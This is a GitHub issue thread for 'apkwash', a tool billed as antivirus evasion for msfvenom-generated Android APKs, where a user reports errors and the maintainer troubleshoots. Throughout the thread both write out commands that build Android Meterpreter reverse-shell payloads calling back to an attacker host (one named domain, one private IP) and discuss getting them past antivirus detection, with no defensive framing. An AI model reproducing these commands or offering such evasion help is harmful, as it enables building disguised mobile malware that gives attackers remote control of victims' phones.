search

jbreed / apkwash

Android APK Antivirus evasion for msfvenom generated payloads.
GNU General Public License v3.0
185 stars 65 forks source link

apkwash error after complete update and dist-upgrade on kali #7

Closed eddRocker closed 6 years ago

eddRocker commented 7 years ago 
root@Devilz-PC:/tmp# apkwash -p android/meterpreter_reverse_http LHOST=speedyzz.ml LPORT=4450 -o payload.apk
 [-]  Generating MSFVenom payload
 [-]  msfvenom -p android/meterpreter_reverse_http LHOST=speedyzz.ml LPORT=4450 -o payload.apk
 [-]  MSFVenom payload successfully generated.
 [-]  Opening the generated payload with APKTool.
 [-]  Scrubbing the payload contents to avoid AV signatures...
 [!]  An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! 

 Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue. Ex: # apt-get update && apt-get dist-upgrade
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2017.2"
VERSION_ID="2017.2"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"

Only following 3 payloads do not work: android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell

Please Help!!!!

jbreed commented 7 years ago

I just updated my Kali distro and it appears the script is still functional when generating (haven't tested against a device, or the AV bypass detection rates) the basic payload.

Linux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-2kali1 (2017-10-16) x86_64 GNU/Linux

Have you tried generating it using the default method? apkwash -g

Also, pass in the '-d' option for debugging and review the /tmp/payload directory.

eddRocker commented 7 years ago

@jbreed apkwash script is working with only few payloads, can you please tell me how to make the script working for android/meterpreter_reverse_https payload.

Please try this command : apkwash -p android/meterpreter_reverse_http LHOST=192.168.1.22 LPORT=443 -g -d

You will encounter this error:```

[-] Generating MSFVenom payload [-] msfvenom -p android/meterpreter_reverse_http LHOST=192.168.1.22 LPORT=443 -o AndroidService.apk [!] MSFVenom payload generation failed.

jbreed commented 7 years ago

For a reverse http payload use android/metasploit/reverse_http. I may need to remove the other three out of the help menu, but would need to verify metasploit doesn't have these three payloads anymore listed as technically they are the same as the other three.

jbreed commented 7 years ago

Taking another look at the message, there is a possibility these three payloads use an older format generated by msf. If that is the case then ideally we should just avoid using those anyways.